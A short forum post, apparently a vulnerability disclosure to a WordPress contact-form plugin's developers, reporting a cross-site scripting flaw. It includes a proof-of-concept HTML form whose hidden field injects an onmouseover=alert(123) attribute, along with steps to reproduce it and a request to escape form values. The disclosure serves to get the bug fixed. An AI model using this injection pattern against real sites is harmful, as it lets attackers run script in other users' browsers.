XSS vulnerability

  • Hello. Our team has discovered a XSS vulnerability. You must escape form values ??to provide fix. Here is a sample form, which can be used to reproduce the problem:

    <html>
  <body>
    <form action="https://yoursiteurl.here/contacts/" method="POST">
      <input type="hidden" name="cf-no-script" value="1" />
      <input type="hidden" name="hidden-1" value="ufo-form-id-1" />
      <input type="hidden" name="id-3324" value="1&apos; onmouseover=alert(123) bad=&apos;" />
      <input type="hidden" name="id-3326" value="1" />
      <input type="hidden" name="id-3327" value="1" />
      <input type="hidden" name="id-3330" value="1" />
      <input type="hidden" name="sid" value="e20579ba69a4faccbb3efb7ef5e0692d" />
      <input type="hidden" name="ufo-form-pagename" value="contacts" />
      <input type="hidden" name="ufo-sign" value="b4cd2c00af96cf60c2db680ffbfa72841412162299" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

    Put appropriate field IDs. Setup one required field and leave value attribute empty. To another field insert next value:

    value="1&apos; onmouseover=alert(123) bad=&apos;" />

    Now you can submit created html form and alert function will run

    https://www.ads-software.com/plugins/easy-contact-forms/

Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • The topic ‘XSS vulnerability’ is closed to new replies.

Tags